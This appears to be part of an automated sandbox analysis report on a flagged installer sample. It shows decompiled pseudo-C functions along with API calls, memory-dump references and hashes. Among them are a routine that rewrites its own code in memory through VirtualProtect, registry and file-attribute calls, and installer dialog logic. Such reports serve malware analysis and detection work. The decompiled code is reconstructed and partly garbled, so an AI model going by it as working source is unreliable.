                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                            • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x713c5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x713c505c, 4, 0x40, 0x713c504c); // executed
					 *0x713c505c = 0xc2;
					 *0x713c504c = 0;
					 *0x713c5054 = 0;
					 *0x713c5068 = 0;
					 *0x713c5058 = 0;
					 *0x713c5050 = 0;
					 *0x713c5060 = 0;
					 *0x713c505e = 0;
				}
				return 1;
			}



                                                                            0x713c2a88
                                                                            0x713c2a8d
                                                                            0x713c2a9d
                                                                            0x713c2aa5
                                                                            0x713c2aac
                                                                            0x713c2ab1
                                                                            0x713c2ab6
                                                                            0x713c2abb
                                                                            0x713c2ac0
                                                                            0x713c2ac5
                                                                            0x713c2aca
                                                                            0x713c2aca
                                                                            0x713c2ad2

                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(713C505C,00000004,00000040,713C504C), ref: 713C2A9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 9f70518d300cc1982721ff9bc50a22ffe381ecac4b27da0c5e9615fad4826030
                                                                            • Instruction ID: b548d9e8d765348feb4e5d782e9f82fa1b3cb650f69264818e00d2cdcfd31f32
                                                                            • Opcode Fuzzy Hash: 9f70518d300cc1982721ff9bc50a22ffe381ecac4b27da0c5e9615fad4826030
                                                                            • Instruction Fuzzy Hash: 0AF0A5F27492A0DED351EF2A84447293BF8B718705BA4452BE588D62C0E734A444DB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6(1);
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                                            0x004023f4
                                                                            0x004023fb
                                                                            0x004023fe
                                                                            0x0040240e
                                                                            0x00402425
                                                                            0x0040242b
                                                                            0x00401751
                                                                            0x004028fc
                                                                            0x00402903
                                                                            0x00402903
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            • Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                            • Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
                                                                            • Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                            • Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                            0x004063b4
                                                                            0x004063bb
                                                                            0x004063ce
                                                                            0x00000000
                                                                            0x004063ce
                                                                            0x004063bf
                                                                            0x00000000

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                            • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                            • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                            0x004015ae
                                                                            0x004015b4
                                                                            0x004015b6
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
                                                                            • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                                                            • Opcode Fuzzy Hash: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
                                                                            • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                            0x004044e5
                                                                            0x004044ec
                                                                            0x004044f7
                                                                            0x00000000
                                                                            0x004044f7
                                                                            0x004044fd

                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                            • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                            • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                            • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                            0x004044dc
                                                                            0x004044e2

                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                            • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                            • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                            • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                            0x004034f3
                                                                            0x004034f9

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}




                                                                            0x004044c5
                                                                            0x004044cb

                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                            • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                            • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                            • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                            0x004014d7
                                                                            0x004014d8
                                                                            0x004014e1
                                                                            0x004014e4
                                                                            0x004014e8
                                                                            0x004014e8
                                                                            0x004014ea
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
                                                                            • Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
                                                                            • Opcode Fuzzy Hash: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
                                                                            • Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x72cc24
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                            0x0040498a
                                                                            0x00404990
                                                                            0x00404996
                                                                            0x004049a3
                                                                            0x004049b1
                                                                            0x004049b4
                                                                            0x004049bc
                                                                            0x004049c2
                                                                            0x004049c2
                                                                            0x004049ce
                                                                            0x004049d1
                                                                            0x00404a3f
                                                                            0x00404a46
                                                                            0x00404b1d
                                                                            0x00404b24
                                                                            0x00404b33
                                                                            0x00404b33
                                                                            0x00404b37
                                                                            0x00404b41
                                                                            0x00404b4e
                                                                            0x00404b50
                                                                            0x00404b50
                                                                            0x00404b5e
                                                                            0x00404b65
                                                                            0x00404b6c
                                                                            0x00404b6f
                                                                            0x00404bab
                                                                            0x00404bad
                                                                            0x00404bb3
                                                                            0x00404bb8
                                                                            0x00404bbc
                                                                            0x00404bbe
                                                                            0x00404bbe
                                                                            0x00404bda
                                                                            0x00000000
                                                                            0x00404bdc
                                                                            0x00404bdf
                                                                            0x00404bed
                                                                            0x00404bf3
                                                                            0x00404bf4
                                                                            0x00404bf7
                                                                            0x00404bfa
                                                                            0x00000000
                                                                            0x00404bfa
                                                                            0x00404b71
                                                                            0x00404b73
                                                                            0x00404b77
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404b79
                                                                            0x00404b79
                                                                            0x00404b86
                                                                            0x00404b8b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404b8f
                                                                            0x00404b91
                                                                            0x00404b91
                                                                            0x00404b9a
                                                                            0x00404b9c
                                                                            0x00404ba1
                                                                            0x00404ba4
                                                                            0x00404ba9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404ba9
                                                                            0x00404c06
                                                                            0x00404c10
                                                                            0x00404c13
                                                                            0x00404c16
                                                                            0x00404c1d
